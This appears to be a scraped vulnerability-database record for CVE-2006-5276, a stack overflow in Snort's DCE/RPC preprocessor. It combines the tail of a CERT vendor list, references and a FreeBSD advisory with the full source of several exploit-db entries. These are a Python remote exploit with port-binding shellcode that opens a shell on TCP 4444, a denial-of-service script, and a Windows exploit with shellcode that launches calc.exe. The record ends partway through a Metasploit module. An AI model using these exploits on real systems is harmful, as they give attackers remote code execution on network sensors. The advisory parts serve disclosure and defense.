Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Symantec, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 85 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.snort.org/docs/advisory-2007-02-19.html>\n * <https://support.sourcefire.com/>\n * <http://iss.net/threats/257.html>\n * <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>\n * <http://www.snort.org/docs/release_notes/release_notes_2613.txt>\n * <http://www.snort.org/dl/>\n * <http://secunia.com/advisories/24235/>\n * <http://secunia.com/advisories/24190/>\n * <http://secunia.com/advisories/24272/>\n * <http://www.securityfocus.com/bid/22616>\n\n### Acknowledgements\n\nThis vulnerability was reported and researched by Neel Mehta from IBM ISS X-Force.\n\nThis document was written by Chris Taschner and Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5276](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5276>) \n---|--- \n**Severity Metric:** | 23.63 \n**Date Public:** | 2007-02-19 \n**Date First Published:** | 2007-02-19 \n**Date Last Updated: ** | 2008-01-30 20:45 UTC \n**Document Revision: ** | 44 \n", "modified": "2008-01-30T20:45:00", "published": "2007-02-19T00:00:00", "id": "VU:196240", "href": "https://www.kb.cert.org/vuls/id/196240", "type": "cert", "title": "Sourcefire Snort DCE/RPC preprocessor does not properly reassemble fragmented packets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "\nA IBM Internet Security Systems Protection Advisory\n\t reports:\n\nSnort is vulnerable to a stack-based buffer overflow as a\n\t result of DCE/RPC reassembly. This vulnerability is in a\n\t dynamic-preprocessor enabled in the default configuration,\n\t and the configuration for this preprocessor allows for\n\t auto-recognition of SMB traffic to perform reassembly\n\t on. No checks are performed to see if the traffic is part\n\t of a valid TCP session, and multiple Write AndX requests\n\t can be chained in the same TCP segment. As a result, an\n\t attacker can exploit this overflow with a single TCP PDU\n\t sent across a network monitored by Snort or Sourcefire.\nSnort users who cannot upgrade immediately are advised to\n\t disable the DCE/RPC preprocessor by removing the DCE/RPC\n\t preprocessor directives from snort.conf and restarting\n\t Snort. However, be advised that disabling the DCE/RPC\n\t preprocessor reduces detection capabilities for attacks in\n\t DCE/RPC traffic. After upgrading, customers should\n\t re-enable the DCE/RPC preprocessor.\n\n", "edition": 4, "modified": "2007-02-19T00:00:00", "published": "2007-02-19T00:00:00", "id": "AFDF500F-C1F6-11DB-95C5-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html", "title": "snort -- DCE/RPC preprocessor vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T18:54:18", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux). CVE-2006-5276. Remote exploit for linux platform", "published": "2007-03-30T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit linux", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-30T00:00:00", "id": "EDB-ID:3609", "href": "https://www.exploit-db.com/exploits/3609/", "sourceData": "#!/usr/bin/python\n#\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\n# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\n#\n# Author shall bear no responsibility for any screw ups caused by using this code\n# Winny Thomas :-)\n\nimport os\nimport sys\nimport time\nfrom scapy import *\n\n# Linux portbind shellcode; Binds shell on TCP port 4444\nshellcode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nshellcode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nshellcode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nshellcode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\"\n\ndef ExploitSnort(target):\n # SMB packet borrowed from http://www.milw0rm.com/exploits/3391\n # NetBIOS Session Service\n smbreq = \"\\x00\\x00\\x02\\xab\"\n\n # SMB Header\n smbreq += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n smbreq += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n smbreq += \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n smbreq += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n smbreq += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n smbreq += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n smbreq += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n smbreq += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n smbreq += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n smbreq += \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n smbreq += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\n smbreq += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n smbreq += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n smbreq += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n smbreq += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n smbreq += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\n # The following address overwrites RET and points into our shellcode\n smbreq += struct.pack('<L', 0xbfffeff0)\n smbreq += '\\x90' * 50\n smbreq += shellcode\n smbreq += '\\x90' * 130\n\n packet = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / smbreq\n send(packet)\n\ndef ConnectRemoteShell(target):\n connect = '/usr/bin/telnet ' + target + ' 4444'\n os.system(connect)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]\n sys.exit(-1)\n\n print '[+] Sending malformed SMB packet'\n ExploitSnort(target)\n print '[+] Connecting to remote shell in 3 seconds...'\n time.sleep(3)\n ConnectRemoteShell(target)\n\n# milw0rm.com [2007-03-30]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3609/"}, {"lastseen": "2016-01-31T18:18:38", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit. CVE-2006-5276. Dos exploits for multiple platform", "published": "2007-02-23T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-02-23T00:00:00", "id": "EDB-ID:3362", "href": "https://www.exploit-db.com/exploits/3362/", "sourceData": "#!/usr/bin/python\n#\n# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)\n# \n# Author: Trirat Puttaraksa <trir00t [at] gmail.com>\n#\n# http://sf-freedom.blogspot.com\n#\n######################################################\n# For educational purpose only\n#\n# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution\n# may be possible, but I have no time to make it :( \n# I will post the information about this vulnerability in my blog soon\n#\n# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) \n# to inject the packet, so you have to install Scapy before use it.\n#\n#######################################################\n\nimport sys\nfrom scapy import *\nfrom struct import pack\nconf.verb = 0\n\n# NetBIOS Session Service\npayload = \"\\x00\\x00\\x01\\xa6\"\n\n# SMB Header\npayload += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\npayload += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\npayload += \"\\x00\\x08\\x30\\x00\"\n\n# Tree Connect AndX Request\npayload += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\npayload += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\npayload += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\npayload += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n# NT Create AndX Request\npayload += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\npayload += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\npayload += \"\\x63\\x00\\x00\\x00\"\n\n# Write AndX Request #1\npayload += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n# Write AndX Request #2\npayload += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\x30\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\nif len(sys.argv) != 2:\n\tprint \"Usage snort_dos_dcerpc.py <fake destination ip>\"\n\tsys.exit(1)\n\ntarget = sys.argv[1]\n\np = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload\nsend(p)\n\n# milw0rm.com [2007-02-23]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3362/"}, {"lastseen": "2016-01-31T18:22:44", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit. CVE-2006-5276. Remote exploit for windows platform", "published": "2007-03-01T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-01T00:00:00", "id": "EDB-ID:3391", "href": "https://www.exploit-db.com/exploits/3391/", "sourceData": "#!/usr/bin/python\n#\n# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)\n# \n# Author: Trirat Puttaraksa <trir00t [at] gmail.com>\n#\n# http://sf-freedom.blogspot.com\n#\n######################################################\n# For educational purpose only\n#\n# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1\n#\n# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) \n# to inject the packet, so you have to install Scapy before use it.\n#\n#######################################################\n\nimport sys\nfrom scapy import *\nfrom struct import pack\nconf.verb = 0\n\n# NetBIOS Session Service\npayload = \"\\x00\\x00\\x02\\xab\"\n\n# SMB Header\npayload += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\npayload += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\npayload += \"\\x00\\x08\\x30\\x00\"\n\n# Tree Connect AndX Request\npayload += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\npayload += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\npayload += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\npayload += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n# NT Create AndX Request\npayload += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\npayload += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\npayload += \"\\x63\\x00\\x00\\x00\"\n\n# Write AndX Request #1\npayload += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n#payload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n# Write AndX Request #2\npayload += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)\npayload += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n\npayload += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\npayload += \"\\xd1\\x80\\xf5\\x83\\xeb\\xfc\\xe2\\xf4\\x55\\x39\\xc4\\xf5\\xa9\\xd1\\x0b\\xb0\"\npayload += \"\\x95\\x5a\\xfc\\xf0\\xd1\\xd0\\x6f\\x7e\\xe6\\xc9\\x0b\\xaa\\x89\\xd0\\x6b\\xbc\"\npayload += \"\\x22\\xe5\\x0b\\xf4\\x47\\xe0\\x40\\x6c\\x05\\x55\\x40\\x81\\xae\\x10\\x4a\\xf8\"\npayload += \"\\xa8\\x13\\x6b\\x01\\x92\\x85\\xa4\\xf1\\xdc\\x34\\x0b\\xaa\\x8d\\xd0\\x6b\\x93\"\npayload += \"\\x22\\xdd\\xcb\\x7e\\xf6\\xcd\\x81\\x1e\\x22\\xcd\\x0b\\xf4\\x42\\x58\\xdc\\xd1\"\npayload += \"\\xad\\x12\\xb1\\x35\\xcd\\x5a\\xc0\\xc5\\x2c\\x11\\xf8\\xf9\\x22\\x91\\x8c\\x7e\"\npayload += \"\\xd9\\xcd\\x2d\\x7e\\xc1\\xd9\\x6b\\xfc\\x22\\x51\\x30\\xf5\\xa9\\xd1\\x0b\\x9d\"\npayload += \"\\x95\\x8e\\xb1\\x03\\xc9\\x87\\x09\\x0d\\x2a\\x11\\xfb\\xa5\\xc1\\xaf\\x58\\x17\"\npayload += \"\\xda\\xb9\\x18\\x0b\\x23\\xdf\\xd7\\x0a\\x4e\\xb2\\xe1\\x99\\xca\\xff\\xe5\\x8d\"\npayload += \"\\xcc\\xd1\\x80\\xf5\"\n\npayload += \"\\x90\" # padding\n\nif len(sys.argv) != 2:\n\tprint \"Usage snort_execute_dcerpc.py <fake destination ip>\"\n\tsys.exit(1)\n\ntarget = sys.argv[1]\n\np = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload\nsend(p)\n\n# milw0rm.com [2007-03-01]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3391/"}, {"lastseen": "2016-02-02T10:19:08", "description": "Snort 2 DCE/RPC preprocessor Buffer Overflow. CVE-2006-5276. Remote exploits for multiple platform", "published": "2012-04-09T00:00:00", "type": "exploitdb", "title": "Snort 2 DCE/RPC preprocessor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2012-04-09T00:00:00", "id": "EDB-ID:18723", "href": "https://www.exploit-db.com/exploits/18723/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Capture\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module allows remote attackers to execute arbitrary code by exploiting the\r\n\t\t\t\tSnort service via crafted SMB 